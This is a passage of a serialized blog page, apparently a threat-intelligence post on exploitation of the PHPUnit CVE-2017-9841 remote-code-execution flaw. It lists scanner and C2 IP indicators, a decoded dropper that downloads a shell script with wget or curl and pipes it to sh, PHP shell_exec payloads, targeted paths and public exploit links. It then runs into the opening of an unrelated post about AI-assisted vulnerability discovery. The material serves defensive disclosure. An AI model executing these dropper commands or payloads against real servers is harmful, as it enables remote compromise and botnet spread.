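        json.dump({"packages": [{"name": "phpunit/phpunit", "version": "4.8.27"}]}, f)
    with open(os.path.join(root, "composer.json"), "w") as f:
        json.dump({"require": {"php": ">=5.6"},
                   "require-dev": {"phpunit/phpunit": "^4.8"}}, f)
    return root


if __name__ == "__main__":
    print(json.dumps(audit(make_fixture()), indent=2))
```

Point `audit()` at a document root on each internet-facing host; `vulnerable` is driven by file presence alone, because a patched PHPUnit recorded in `installed.json` says nothing about a stale `vendor/` copy that was never redeployed.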
There's nothing technically sophisticated about it; a PHP ",[886,1908,1909],{},"eval()"," call on user-supplied input is about as elementary a vulnerability class as exists. But elementary vulnerabilities in widely deployed software, packaged inside dependency managers and exposed by deployment misconfigurations, have an extraordinary shelf life.",[18,1912,1913],{},"The VulnCheck Canary data makes one thing clear: attackers are still finding and exploiting this. The scanning infrastructure is active, organized, and running multi-exploit campaigns that treat CVE-2017-9841 as a reliable component of a web application compromise playbook alongside much newer vulnerabilities.",[18,1915,1916],{},"After nine years, the fix is the same as it was in 2017: don't ship your test dependencies to production, and don't web-serve your vendor directory. The attackers are counting on the fact that many teams still haven't gotten there.",[1308,1918],{},[1920,1921,1923],"h1",{"id":1922},"iocs-below","IOCs Below",[1925,1926,1927],"blockquote",{},[18,1928,1929,1930,1933],{},"⚠️ ",[295,1931,1932],{},"Warning:"," All IPs and domains below have been observed conducting active exploitation attempts against CVE-2017-9841. Block or alert on these indicators at your perimeter, WAF, and SIEM. 
Interact with C2 infrastructure at your own risk.",[1308,1935],{},[61,1937,1939],{"id":1938},"scanner-ips","Scanner IPs",[18,1941,1942],{},"IPs directly observed sending exploitation payloads to VulnCheck Canaries.",[307,1944,1945,1962],{},[310,1946,1947],{},[313,1948,1949,1952,1954,1957,1959],{},[316,1950,1951],{},"IP Address",[316,1953,1461],{},[316,1955,1956],{},"AS Name",[316,1958,1464],{},[316,1960,1961],{},"Observed Activity",[336,1963,1964,1982,2000,2019,2042],{},[313,1965,1966,1970,1973,1976,1979],{},[341,1967,1968],{},[886,1969,1474],{},[341,1971,1972],{},"AS25369",[341,1974,1975],{},"Hydra Communications Ltd",[341,1977,1978],{},"🇬🇧 United Kingdom",[341,1980,1981],{},"Mass scanner — PHPUnit RCE + ThinkPHP RCE + PHP CGI + Apache path traversal",[313,1983,1984,1988,1991,1994,1997],{},[341,1985,1986],{},[886,1987,1488],{},[341,1989,1990],{},"AS8560",[341,1992,1993],{},"IONOS SE",[341,1995,1996],{},"🇺🇸 United States",[341,1998,1999],{},"PHPUnit RCE scanner — exhaustive path enumeration",[313,2001,2002,2007,2010,2013,2016],{},[341,2003,2004],{},[886,2005,2006],{},"116.99.50.13",[341,2008,2009],{},"AS7552",[341,2011,2012],{},"Viettel Group",[341,2014,2015],{},"🇻🇳 Vietnam",[341,2017,2018],{},"PHPUnit RCE — shell_exec + encoded C2 dropper",[313,2020,2021,2026,2029,2032,2035],{},[341,2022,2023],{},[886,2024,2025],{},"167.86.88.40",[341,2027,2028],{},"AS51167",[341,2030,2031],{},"Contabo GmbH",[341,2033,2034],{},"🇫🇷 France",[341,2036,2037,2038,2041],{},"PHPUnit RCE — wget\u002Fcurl C2 downloader (",[886,2039,2040],{},"apache.selfrep"," tag)",[313,2043,2044,2049,2052,2055,2058],{},[341,2045,2046],{},[886,2047,2048],{},"83.168.88.41",[341,2050,2051],{},"AS35179",[341,2053,2054],{},"Korbank S.A.",[341,2056,2057],{},"🇵🇱 Poland",[341,2059,2037,2060,2041],{},[886,2061,2040],{},[18,2063,2064,2067,2068,1246,2071,1246,2074,1246,2077,1246,2080,1246,2083,1246,2086,1246,2089,1246,2092,1246,2095,1246,2098,2101,2102,2105],{},[295,2065,2066],{},"Note on Cloudflare IPs:"," Several 
Cloudflare egress IPs (",[886,2069,2070],{},"104.23.225.154",[886,2072,2073],{},"104.23.225.155",[886,2075,2076],{},"104.23.229.65",[886,2078,2079],{},"141.101.68.221",[886,2081,2082],{},"141.101.97.102",[886,2084,2085],{},"172.68.151.20",[886,2087,2088],{},"172.68.151.21",[886,2090,2091],{},"172.71.122.170",[886,2093,2094],{},"172.71.126.163",[886,2096,2097],{},"172.71.135.24",[886,2099,2100],{},"172.71.232.146",") were observed making ",[886,2103,2104],{},"curl\u002F8.7.1"," requests to PHPUnit paths. These are likely Cloudflare Workers proxying attacker traffic. Block the specific paths rather than the IPs for these.",[1308,2107],{},[61,2109,2111],{"id":2110},"c2-payload-delivery-infrastructure","C2 \u002F Payload Delivery Infrastructure",[18,2113,2114],{},"IPs and URLs found within exploitation payloads — these are attacker-controlled infrastructure used to deliver second-stage shells.",[307,2116,2117,2129],{},[310,2118,2119],{},[313,2120,2121,2124,2127],{},[316,2122,2123],{},"Type",[316,2125,2126],{},"Indicator",[316,2128,334],{},[336,2130,2131,2143,2155,2166],{},[313,2132,2133,2136,2140],{},[341,2134,2135],{},"IP",[341,2137,2138],{},[886,2139,1758],{},[341,2141,2142],{},"Primary C2\u002Fdropper host — observed in payloads from multiple source IPs",[313,2144,2145,2147,2152],{},[341,2146,2135],{},[341,2148,2149],{},[886,2150,2151],{},"185.177.72.51",[341,2153,2154],{},"Secondary C2 IP — observed in payload decode",[313,2156,2157,2159,2164],{},[341,2158,2135],{},[341,2160,2161],{},[886,2162,2163],{},"185.177.72.68",[341,2165,2154],{},[313,2167,2168,2171,2175],{},[341,2169,2170],{},"URL",[341,2172,2173],{},[886,2174,1561],{},[341,2176,2177,2178,2180,2181,2183,2184],{},"Shell download endpoint — fetched via ",[886,2179,1553],{},"\u002F",[886,2182,1557],{}," and piped to ",[886,2185,2186],{},"sh",[18,2188,2189,2192],{},[295,2190,2191],{},"Decoded dropper command"," (base64 payload observed in live 
exploitation):",[1354,2194,2198],{"className":2195,"code":2196,"language":2197,"meta":219,"style":219},"language-bash shiki shiki-themes material-theme-lighter github-light github-dark monokai","(wget --no-check-certificate -qO- https:\u002F\u002F125.135.169.171\u002Fsh || curl -sk https:\u002F\u002F125.135.169.171\u002Fsh) | sh -s cve_2024_4577.selfrep\n","bash",[886,2199,2200],{"__ignoreMap":219},[1373,2201,2202,2204,2207,2211,2214,2217,2220,2223,2226,2228,2231,2234,2237,2240],{"class":1375,"line":1376},[1373,2203,1384],{"class":1383},[1373,2205,1553],{"class":2206},"sR7ES",[1373,2208,2210],{"class":2209},"sFhLe"," --no-check-certificate",[1373,2212,2213],{"class":2209}," -qO-",[1373,2215,2216],{"class":1391}," https:\u002F\u002F125.135.169.171\u002Fsh",[1373,2218,2219],{"class":1397}," ||",[1373,2221,2222],{"class":2206}," curl",[1373,2224,2225],{"class":2209}," -sk",[1373,2227,2216],{"class":1391},[1373,2229,2230],{"class":1383},")",[1373,2232,2233],{"class":1397}," |",[1373,2235,2236],{"class":2206}," sh",[1373,2238,2239],{"class":2209}," -s",[1373,2241,2242],{"class":1391}," cve_2024_4577.selfrep\n",[18,2244,2245,2246,2249],{},"The ",[886,2247,2248],{},"cve_2024_4577.selfrep"," argument tag indicates this dropper self-replicates and is part of a broader campaign simultaneously exploiting CVE-2024-4577 (PHP CGI RCE).",[1308,2251],{},[61,2253,2255],{"id":2254},"http-indicators","HTTP Indicators",[993,2257,2259],{"id":2258},"user-agents","User Agents",[307,2261,2262,2271],{},[310,2263,2264],{},[313,2265,2266,2269],{},[316,2267,2268],{},"User Agent",[316,2270,334],{},[336,2272,2273,2282],{},[313,2274,2275,2279],{},[341,2276,2277],{},[886,2278,1751],{},[341,2280,2281],{},"Primary scanner UA — observed in 90%+ of PHPUnit hits",[313,2283,2284,2288],{},[341,2285,2286],{},[886,2287,2104],{},[341,2289,2290],{},"Secondary scanner UA — associated with Cloudflare-proxied requests",[993,2292,2294],{"id":2293},"request-method-body-patterns","Request Method & Body 
Patterns",[18,2296,2297,2298,2301],{},"All exploitation attempts use ",[295,2299,2300],{},"HTTP POST"," to the target paths with PHP code in the request body.",[18,2303,2304,2307],{},[295,2305,2306],{},"Fingerprinting payloads"," (used to confirm RCE before deploying full dropper):",[1354,2309,2312],{"className":2310,"code":2311,"language":1359,"meta":219},[1357],"\u003C?php echo(md5(\"Hello PHPUnit\"));\n",[886,2313,2311],{"__ignoreMap":219},[1354,2315,2317],{"className":1367,"code":2316,"language":1369,"meta":219,"style":219},"\u003C?php echo md5('phpunit_rce'); ?>\n",[886,2318,2319],{"__ignoreMap":219},[1373,2320,2321,2324,2327,2330,2333,2335,2337,2340,2342,2345],{"class":1375,"line":1376},[1373,2322,2323],{"class":1397},"\u003C?",[1373,2325,1369],{"class":2326},"sQeA1",[1373,2328,2329],{"class":1379}," echo",[1373,2331,2332],{"class":1379}," md5",[1373,2334,1384],{"class":1383},[1373,2336,1388],{"class":1387},[1373,2338,2339],{"class":1391},"phpunit_rce",[1373,2341,1388],{"class":1387},[1373,2343,2344],{"class":1383},");",[1373,2346,2347],{"class":1397}," ?>\n",[18,2349,2350],{},[295,2351,2352],{},"Shell execution payload pattern:",[1354,2354,2356],{"className":1367,"code":2355,"language":1369,"meta":219,"style":219},"\u003C?php shell_exec(base64_decode(\"\u003Cbase64_encoded_dropper>\")); echo(md5(\"Hello CVE-2024-4577\")); ?>\n",[886,2357,2358],{"__ignoreMap":219},[1373,2359,2360,2362,2364,2367,2369,2372,2374,2376,2379,2381,2384,2386,2388,2391,2393,2395,2398,2400,2402],{"class":1375,"line":1376},[1373,2361,2323],{"class":1397},[1373,2363,1369],{"class":2326},[1373,2365,2366],{"class":1379}," 
shell_exec",[1373,2368,1384],{"class":1383},[1373,2370,2371],{"class":1379},"base64_decode",[1373,2373,1384],{"class":1383},[1373,2375,183],{"class":1387},[1373,2377,2378],{"class":1391},"\u003Cbase64_encoded_dropper>",[1373,2380,183],{"class":1387},[1373,2382,2383],{"class":1383},"));",[1373,2385,2329],{"class":1379},[1373,2387,1384],{"class":1383},[1373,2389,2390],{"class":1379},"md5",[1373,2392,1384],{"class":1383},[1373,2394,183],{"class":1387},[1373,2396,2397],{"class":1391},"Hello CVE-2024-4577",[1373,2399,183],{"class":1387},[1373,2401,2383],{"class":1383},[1373,2403,2347],{"class":1397},[993,2405,2407],{"id":2406},"vulncheck-signature","VulnCheck Signature",[307,2409,2410,2420],{},[310,2411,2412],{},[313,2413,2414,2417],{},[316,2415,2416],{},"Signature ID",[316,2418,2419],{},"Signature Name",[336,2421,2422],{},[313,2423,2424,2429],{},[341,2425,2426],{},[886,2427,2428],{},"12700264",[341,2430,2431],{},[886,2432,1435],{},[1308,2434],{},[61,2436,2438],{"id":2437},"url-paths-targeted","URL Paths Targeted",[18,2440,2441],{},"All 30 unique paths observed in active scanning campaigns. 
Attackers enumerate all of these in a single session to find PHPUnit in non-standard installation locations.",[1354,2443,2446],{"className":2444,"code":2445,"language":1359,"meta":219},[1357],"\u002FV2\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fadmin\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapi\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapp\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapps\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fbackup\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fblog\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fcms\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fcrm\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fdemo\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flaravel\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fpanel\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fpublic\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Ftest\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Ftesting\u002Fvendor\u002Fphpunit\
u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Ftests\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fvendor\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fvendor\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fworkspace\u002Fdrupal\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fws\u002Fec\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fws\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fwww\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fyii\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fzend\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n",[886,2447,2445],{"__ignoreMap":219},[1308,2449],{},[61,2451,2453],{"id":2452},"exploit-tools-public-resources","Exploit Tools & Public Resources",[18,2455,2456],{},"Public exploit tooling observed or tracked by VulnCheck for CVE-2017-9841. 
These are documented for defensive awareness.",[307,2458,2459,2473],{},[310,2460,2461],{},[313,2462,2463,2466,2469,2471],{},[316,2464,2465],{},"Tool \u002F Resource",[316,2467,2468],{},"Source",[316,2470,2123],{},[316,2472,334],{},[336,2474,2475,2492,2509,2524,2540,2556,2571,2587,2602,2617,2632,2649,2665,2681,2698,2716],{},[313,2476,2477,2483,2486,2489],{},[341,2478,2479],{},[47,2480,1680],{"href":2481,"rel":2482},"https:\u002F\u002Fgithub.com\u002FRandomRobbieBF\u002Fphpunit-brute",[51],[341,2484,2485],{},"GitHub",[341,2487,2488],{},"Mass scanner",[341,2490,2491],{},"Python-based brute-force scanner",[313,2493,2494,2501,2503,2506],{},[341,2495,2496],{},[47,2497,2500],{"href":2498,"rel":2499},"https:\u002F\u002Fgithub.com\u002Fludy-dev\u002FPHPUnit_eval-stdin_RCE",[51],"PHPUnit_eval-stdin_RCE",[341,2502,2485],{},[341,2504,2505],{},"PoC exploit",[341,2507,2508],{},"Python RCE script",[313,2510,2511,2517,2519,2521],{},[341,2512,2513],{},[47,2514,1683],{"href":2515,"rel":2516},"https:\u002F\u002Fgithub.com\u002Fincogbyte\u002Flaravel-phpunit-rce-masscaner",[51],[341,2518,2485],{},[341,2520,2488],{},[341,2522,2523],{},"Laravel-specific path enumeration",[313,2525,2526,2533,2535,2537],{},[341,2527,2528],{},[47,2529,2532],{"href":2530,"rel":2531},"https:\u002F\u002Fgithub.com\u002Fakr3ch\u002FCVE-2017-9841",[51],"CVE-2017-9841 (akr3ch)",[341,2534,2485],{},[341,2536,2505],{},[341,2538,2539],{},"Python",[313,2541,2542,2549,2551,2553],{},[341,2543,2544],{},[47,2545,2548],{"href":2546,"rel":2547},"https:\u002F\u002Fgithub.com\u002Fp1ckzi\u002FCVE-2017-9841",[51],"CVE-2017-9841 (p1ckzi)",[341,2550,2485],{},[341,2552,2505],{},[341,2554,2555],{},"Shell script",[313,2557,2558,2565,2567,2569],{},[341,2559,2560],{},[47,2561,2564],{"href":2562,"rel":2563},"https:\u002F\u002Fgithub.com\u002Fjax7sec\u002FCVE-2017-9841",[51],"CVE-2017-9841 
(jax7sec)",[341,2566,2485],{},[341,2568,2505],{},[341,2570,2539],{},[313,2572,2573,2580,2582,2584],{},[341,2574,2575],{},[47,2576,2579],{"href":2577,"rel":2578},"https:\u002F\u002Fgithub.com\u002Fmileticluka1\u002Feval-stdin",[51],"eval-stdin (mileticluka1)",[341,2581,2485],{},[341,2583,2505],{},[341,2585,2586],{},"Ruby",[313,2588,2589,2596,2598,2600],{},[341,2590,2591],{},[47,2592,2595],{"href":2593,"rel":2594},"https:\u002F\u002Fgithub.com\u002Fdream434\u002FCVE-2017-9841",[51],"CVE-2017-9841 (dream434)",[341,2597,2485],{},[341,2599,2505],{},[341,2601,2539],{},[313,2603,2604,2611,2613,2615],{},[341,2605,2606],{},[47,2607,2610],{"href":2608,"rel":2609},"https:\u002F\u002Fgithub.com\u002FMrG3P5\u002FCVE-2017-9841",[51],"CVE-2017-9841 (MrG3P5)",[341,2612,2485],{},[341,2614,2505],{},[341,2616,2539],{},[313,2618,2619,2626,2628,2630],{},[341,2620,2621],{},[47,2622,2625],{"href":2623,"rel":2624},"https:\u002F\u002Fgithub.com\u002FChocapikk\u002FCVE-2017-9841",[51],"CVE-2017-9841 (Chocapikk)",[341,2627,2485],{},[341,2629,2505],{},[341,2631,2539],{},[313,2633,2634,2641,2643,2646],{},[341,2635,2636],{},[47,2637,2640],{"href":2638,"rel":2639},"https:\u002F\u002Fgithub.com\u002Fjoelindra\u002FArgus",[51],"Argus (joelindra)",[341,2642,2485],{},[341,2644,2645],{},"Multi-vuln scanner",[341,2647,2648],{},"CVE-2017-9841 module",[313,2650,2651,2658,2660,2662],{},[341,2652,2653],{},[47,2654,2657],{"href":2655,"rel":2656},"https:\u002F\u002Fgithub.com\u002Fdrcrypterdotru\u002FPHPUnit-GoScan",[51],"PHPUnit-GoScan (drcrypterdotru)",[341,2659,2485],{},[341,2661,2488],{},[341,2663,2664],{},"Go-based, added Aug 2025",[313,2666,2667,2674,2676,2678],{},[341,2668,2669],{},[47,2670,2673],{"href":2671,"rel":2672},"https:\u002F\u002Fgithub.com\u002FHabibullah1101\u002FPHPUnit-GoScan",[51],"PHPUnit-GoScan (Habibullah1101)",[341,2675,2485],{},[341,2677,2488],{},[341,2679,2680],{},"Go-based fork, added Sep 
2025",[313,2682,2683,2690,2693,2695],{},[341,2684,2685],{},[47,2686,2689],{"href":2687,"rel":2688},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F50702",[51],"ExploitDB #50702",[341,2691,2692],{},"Exploit-DB",[341,2694,2505],{},[341,2696,2697],{},"PHPUnit 4.8.28 RCE (unauthenticated)",[313,2699,2700,2707,2710,2713],{},[341,2701,2702],{},[47,2703,2706],{"href":2704,"rel":2705},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Finitial-access?cve=CVE-2017-9841",[51],"VulnCheck Initial Access",[341,2708,2709],{},"VulnCheck",[341,2711,2712],{},"Weaponized",[341,2714,2715],{},"Commercially available weaponized module (April 2024+)",[313,2717,2718,2725,2728,2730],{},[341,2719,2720],{},[47,2721,2724],{"href":2722,"rel":2723},"https:\u002F\u002Fraw.githubusercontent.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fmain\u002Fhttp\u002Fcves\u002F2017\u002FCVE-2017-9841.yaml",[51],"Nuclei Template",[341,2726,2727],{},"ProjectDiscovery",[341,2729,1710],{},[341,2731,2732],{},"YAML detection template",[1308,2734],{},[61,2736,2738],{"id":2737},"cve-metadata-intelligence-summary","CVE Metadata & Intelligence Summary",[307,2740,2741,2751],{},[310,2742,2743],{},[313,2744,2745,2748],{},[316,2746,2747],{},"Field",[316,2749,2750],{},"Value",[336,2752,2753,2761,2769,2777,2787,2795,2806,2814,2822,2830,2838],{},[313,2754,2755,2758],{},[341,2756,2757],{},"CVE ID",[341,2759,2760],{},"CVE-2017-9841",[313,2762,2763,2766],{},[341,2764,2765],{},"Affected Software",[341,2767,2768],{},"PHPUnit \u003C 4.8.28, PHPUnit 5.x \u003C 5.6.3",[313,2770,2771,2774],{},[341,2772,2773],{},"Vulnerability Type",[341,2775,2776],{},"Remote Code Execution (Unauthenticated)",[313,2778,2779,2782],{},[341,2780,2781],{},"Attack Vector",[341,2783,2784,2785],{},"Network — HTTP POST to exposed ",[886,2786,1318],{},[313,2788,2789,2792],{},[341,2790,2791],{},"CVSS Score",[341,2793,2794],{},"9.8 Critical",[313,2796,2797,2800],{},[341,2798,2799],{},"EPSS 
Score",[341,2801,2802,2805],{},[295,2803,2804],{},"94.21%"," (99.9th percentile)",[313,2807,2808,2811],{},[341,2809,2810],{},"NVD Published",[341,2812,2813],{},"June 27, 2017",[313,2815,2816,2819],{},[341,2817,2818],{},"First Exploit Published",[341,2820,2821],{},"May 18, 2020",[313,2823,2824,2827],{},[341,2825,2826],{},"First Botnet Activity",[341,2828,2829],{},"November 22, 2020",[313,2831,2832,2835],{},[341,2833,2834],{},"Total Public Exploits (VulnCheck)",[341,2836,2837],{},"18",[313,2839,2840,2843],{},[341,2841,2842],{},"Tracked Botnets (VulnCheck)",[341,2844,401],{},[1308,2846],{},[61,2848,2850],{"id":2849},"references","References",[22,2852,2853,2860,2867,2873,2880],{},[25,2854,2855],{},[47,2856,2859],{"href":2857,"rel":2858},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2017-9841",[51],"NVD — CVE-2017-9841",[25,2861,2862],{},[47,2863,2866],{"href":2864,"rel":2865},"https:\u002F\u002Fwww.cisa.gov\u002Fknown-exploited-vulnerabilities-catalog",[51],"CISA KEV — CVE-2017-9841",[25,2868,2869],{},[47,2870,1233],{"href":2871,"rel":2872},"https:\u002F\u002Fvulncheck.com\u002Fkev",[51],[25,2874,2875],{},[47,2876,2879],{"href":2877,"rel":2878},"https:\u002F\u002Fvulncheck.com\u002Fbrowse\u002Fcve\u002FCVE-2017-9841",[51],"VulnCheck Exploit Intelligence — CVE-2017-9841",[25,2881,2882],{},[47,2883,2886],{"href":2884,"rel":2885},"https:\u002F\u002Fblog.qualys.com\u002Fvulnerabilities-threat-research\u002F2025\u002F10\u002F30\u002Fwhat-security-teams-need-to-know-as-php-and-iot-exploits-surge",[51],"Qualys Blog — PHP and IoT Exploits Surge (Oct 2025)",[1308,2888],{},[61,2890,202],{"id":201},[18,2892,205],{},[18,2894,208],{},[18,2896,211,2897,217],{},[47,2898,216],{"href":214,"rel":2899},[51],[2901,2902,2903],"style",{},"html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .swvn1, html code.shiki 
var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":2905},[2906,2907,2912,2918,2919,2920,2921,2922,2923,2924,2929,2930,2931,2932,2933],{"id":1338,"depth":220,"text":1339},{"id":1424,"depth":220,"text":1425,"children":2908},[2909,2910,2911],{"id":1445,"depth":1266,"text":1446},{"id":1518,"depth":1266,"text":1519},{"id":1538,"depth":1266,"text":1539},{"id":1593,"depth":220,"text":1594,"children":2913},[2914,2915,2916,2917],{"id":1607,"depth":1266,"text":1608},{"id":1648,"depth":1266,"text":1649},{"id":1662,"depth":1266,"text":1663},{"id":1669,"depth":1266,"text":1670},{"id":1692,"depth":220,"text":1693},{"id":1709,"depth":220,"text":1710},{"id":1781,"depth":220,"text":1782},{"id":1902,"depth":220,"text":1903},{"id":1938,"depth":220,"text":1939},{"id":2110,"depth":220,"text":2111},{"id":2254,"depth":220,"text":2255,"children":2925},[2926,2927,2928],{"id":2258,"depth":1266,"text":2259},{"id":2293,"depth":1266,"text":2294},{"id":2406,"depth":1266,"text":2407},{"id":2437,"depth":220,"text":2438},{"id":2452,"depth":220,"text":2453},{"id":2737,"depth":220,"text":2738},{"id":2849,"depth":220,"text":2850},{"id":201,"depth":220,"text":202},"2026-05-19T09:00:00-05:00","CVE-2017-9841 is still a primary exploit path for 
several botnets. What is old is still new in the eyes of cybercrime.",{},"\u002Fblog\u002Fcve-2017-9841",{"title":1285,"description":2935},"blog\u002Fcve-2017-9841",[242,2941,2942,2943],"canary","initial access","cve-2017-9841","Dg6GxePTJ6NRnDNutqu-aBZe8YoZuZLDuP3fOhvCLSY",{"id":2946,"title":1225,"articles":2947,"authors":2961,"body":2963,"date":3243,"description":233,"extension":234,"image":7,"link":7,"meta":3244,"navigation":237,"path":3246,"seo":3247,"series":7,"stem":3248,"subtype":7,"tags":3249,"__hash__":3250},"blog\u002Fblog\u002Fai-assisted-vulnerability-discovery.md",[2948,2953,2957],{"title":2949,"source":2950,"link":2951,"date":2952},"Over 10 threat groups are now feasting on your Cisco SD-WAN","The Stack","https:\u002F\u002Fwww.thestack.technology\u002Fover-10-threat-groups-are-now-feasting-on-your-cisco-sd-wan\u002F","2026-05-15",{"title":2954,"source":2955,"link":2956,"date":2952},"AI revolution? CVE disclosures jump by up to 500% for some vendors","Cyberdaily.AU","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F13600-ai-revolution-cve-disclosures-jump-by-up-to-500-per-cent-for-some-vendors",{"title":2958,"source":2950,"link":2959,"date":2960},"UK regulators sound alarm over frontier AI threat","https:\u002F\u002Fwww.thestack.technology\u002Fuk-regulators-sound-alarm-over-frontier-ai-threat\u002F","2026-05-18",[2962],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":2964,"toc":3227},[2965,2971,2974,2994,3003,3012,3021,3024,3028,3033,3036,3039,3043,3046,3050,3056,3059,3066,3070,3075,3078,3081,3102,3106,3111,3114,3117,3120,3126,3130,3135,3138,3141,3147,3150,3155,3158,3161,3167,3171,3174,3177,3180,3186,3190,3193,3195,3209,3213,3216,3218,3220,3222],[18,2966,2967],{},[68,2968],{"alt":2969,"src":2970},"CVE Growth","\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Ftop20_cnas_cumulative.png",[18,2972,2973],{},"Key Takeaways:",[22,2975,2976,2979,2982,2985,2988,2991],{},[25,2977,2978],{},"CVE disclosure volumes are up sharply 
year-to-date (YTD) across several software suppliers, including Chrome (+563.2%), VMware (+180.9%), Apache (+170.3%), Mozilla (+156.9%), HPE (+132.3%), and F5 (+113.8%).",[25,2980,2981],{},"GitHub CVE issuance is also up significantly YTD (+476.07%), with GitHub indicating the increase is spread across many reporters and projects rather than concentrated in one source.",[25,2983,2984],{},"The increases are consistent with broader use of AI-assisted vulnerability discovery, though the signal is still emerging and not all increases can be directly attributed to AI.",[25,2986,2987],{},"Public examples from Mozilla, Microsoft, Apache, Curl, and Palo Alto show AI models being used to find, validate, or triage vulnerabilities, with mixed results depending on the project.",[25,2989,2990],{},"What is less clear is whether these volumes will be sustained, or whether this is a temporary surge as frontier AI models are applied across different code bases.",[25,2992,2993],{},"Defenders should prepare for higher vulnerability volumes while continuing to use threat intelligence to prioritize emerging threats that are being actively exploited or likely to be.",[18,2995,2996,2997,3002],{},"Since the start of this year, I've been watching for evidence of AI-assisted vulnerability discovery in publicly disclosed CVE volumes. The early signals were noisy. Our \"",[47,2998,3001],{"href":2999,"rel":3000},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Freport",[51],"report a vulnerability","\" service saw a flood of submissions that, frankly, started as slop. But over the past few months, the quality of incoming submissions has noticeably improved, and the underlying volume hasn't subsided.",[18,3004,3005,3006,3011],{},"Then on April 7, 2026, Anthropic announced ",[47,3007,3010],{"href":3008,"rel":3009},"https:\u002F\u002Fwww.anthropic.com\u002Fproject\u002Fglasswing",[51],"Project Glasswing"," and Claude Mythos Preview, and the conversation shifted hard. 
